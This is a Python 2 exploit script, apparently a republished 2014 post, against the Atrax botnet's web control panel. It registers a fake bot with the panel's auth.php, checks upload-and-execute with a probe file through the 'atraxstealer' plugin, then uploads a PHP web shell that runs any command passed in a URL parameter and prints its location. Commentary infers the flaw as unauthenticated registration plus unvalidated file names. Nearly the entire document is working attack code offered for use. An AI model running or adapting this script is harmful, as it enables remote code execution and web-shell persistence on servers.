Atrax Botnet Shell Upload Vulnerability
来源:1337day.com 作者:Xylitol 发布时间:2014-11-25  
import random
import string
import base64
import urllib
import urllib2
  
# <CONFIG>
# `payload` is the content sent for the uploaded file; `url` is the base URL of
# the panel under test. Paths are appended to `url` by plain concatenation, so
# it has to end with '/'.
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>

# Values this script sends in the GET mode parameter of auth.php.
BOT_MODE_INSERT = 'b'
BOT_MODE_RUNPLUGIN = 'e'

# Name of the GET parameter that carries the mode value.
GET_PARAM_MODE = 'a'

# Names of the POST fields sent to auth.php. What each field means is taken
# from the constant names only; the panel's own source is not shown here.
POST_PARAM_GUID = 'h'
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
  
def request(url, get, post):
        """Send one HTTP request with urllib2 and return the response body.

        `get` is a ready-made query string, appended after '?' when non-empty.
        `post` is a 'k=v&k=v' string; it is taken apart and re-encoded with
        urllib.urlencode. Each pair is split on every '=', so only the text
        between the first and second '=' is kept as the value, and a pair
        without '=' raises IndexError.

        A data argument is handed to urllib2.Request on every call, even when
        `post` is empty. There is no timeout and no error handling here:
        urllib2 exceptions propagate to the caller.
        """
        target = url
        if get != '':
                target = url + '?' + get
        fields = {}
        if post != '':
                for pair in post.split('&'):
                        parts = pair.split('=')
                        fields[parts[0]] = parts[1]
        body = urllib.urlencode(fields)
        reply = urllib2.urlopen(urllib2.Request(target, body))
        return reply.read()
  
def queryValue(key, value, next=True):
        """Return 'key=value', followed by '&' unless `next` is false.

        No escaping is applied to either part; the result is only an
        intermediate string that request() splits apart again.
        """
        separator = '&' if next else ''
        return key + '=' + value + separator
  
def randomString(length = 8):
        """Return `length` characters drawn from lowercase ASCII letters and digits.

        Uses the `random` module, which is not a cryptographic generator; in
        this file the result only serves as filler field values and file names.
        """
        alphabet = string.ascii_lowercase + string.digits
        chars = []
        for _ in range(length):
                chars.append(random.choice(alphabet))
        return ''.join(chars)
  
def createVictim(url, guid, ip):
        """POST a bot registration record to auth.php and return the response body.

        The request uses mode BOT_MODE_INSERT and carries the caller's `guid`
        and `ip`; build id, PC, OS, CPU and GPU are random filler strings and
        the admin field is the literal 'yes'. The caller treats a response of
        'STOP' as a refusal.

        NOTE(review): nothing in this request authenticates the sender, so the
        panel appears to accept registrations from any client -- inferred from
        this script; the panel's source is not shown.
        """
        query = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
        body_parts = [
                queryValue(POST_PARAM_GUID, guid),
                queryValue(POST_PARAM_IP, ip),
                queryValue(POST_PARAM_BUILDID, randomString()),
                queryValue(POST_PARAM_PC, randomString()),
                queryValue(POST_PARAM_OS, randomString()),
                queryValue(POST_PARAM_ADMIN, 'yes'),
                queryValue(POST_PARAM_CPU, randomString()),
                queryValue(POST_PARAM_GPU, randomString(), False),
        ]
        return request(url + 'auth.php', query, ''.join(body_parts))
  
def exploit(url, guid, ip, file, payload):
        """POST a run-plugin request for the 'atraxstealer' plugin to auth.php.

        The request uses mode BOT_MODE_RUNPLUGIN with the registered `guid`
        and `ip`. Field 'ad' carries `file`, 'ab' carries `payload`
        base64-encoded, 'am' a random string and 'ai' the literal '18'. The
        response is discarded and nothing is returned.

        NOTE(review): testExploit() fetches the same file name from
        plugins/atraxstealer/wallet/, which suggests the plugin handler stores
        the decoded 'ab' content under the name given in 'ad' inside a
        web-served directory. The root cause would then be server-side: a
        client-supplied file name and extension accepted without validation --
        inferred; the panel's source is not shown.
        """
        query = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
        body_parts = [
                queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer'),
                queryValue(POST_PARAM_GUID, guid),
                queryValue(POST_PARAM_IP, ip),
                queryValue('am', randomString()),
                queryValue('ad', file),
                queryValue('ab', base64.b64encode(payload)),
                queryValue('ai', '18', False),
        ]
        request(url + 'auth.php', query, ''.join(body_parts))
  
def testExploit(url, guid, ip):
        """Check whether the panel stores and executes an uploaded .php file.

        Sends a marker file that only echoes '1337' under a random name, then
        requests it from plugins/atraxstealer/wallet/. Returns True when the
        stripped response body is exactly '1337', i.e. the file was served
        after being run as PHP rather than returned as source text.
        """
        probe_name = randomString() + '.php'
        marker = '<?php echo("1337"); ?>'
        exploit(url, guid, ip, probe_name, marker)
        probe_url = url + 'plugins/atraxstealer/wallet/' + probe_name
        body = request(probe_url, '', '')
        return body.strip() == '1337'
          
# Script body: register a bot record, probe with the marker file, and only then
# send the configured payload. `guid` and `ip` are the hard-coded sample values
# from the original post.
#
# Seen from the panel's logs, a run is one POST to auth.php with a=b, two POSTs
# with a=e, and requests for new '<8 chars>.php' files under
# plugins/atraxstealer/wallet/.
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
file = randomString() + '.php'

if createVictim(url, guid, ip).strip() != 'STOP':
        print '[~] Victim created/updated...'
        if not testExploit(url, guid, ip):
                # The marker file did not come back as '1337'.
                print '[-] Cannot upload payload, maybe the plugin is not actived?'
        else:
                exploit(url, guid, ip, file, payload)
                print '[+] Exploit uploaded!'
                print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
else:
        # The panel answered 'STOP' to the registration request.
        print '[-] Cannot create victim...'
  

 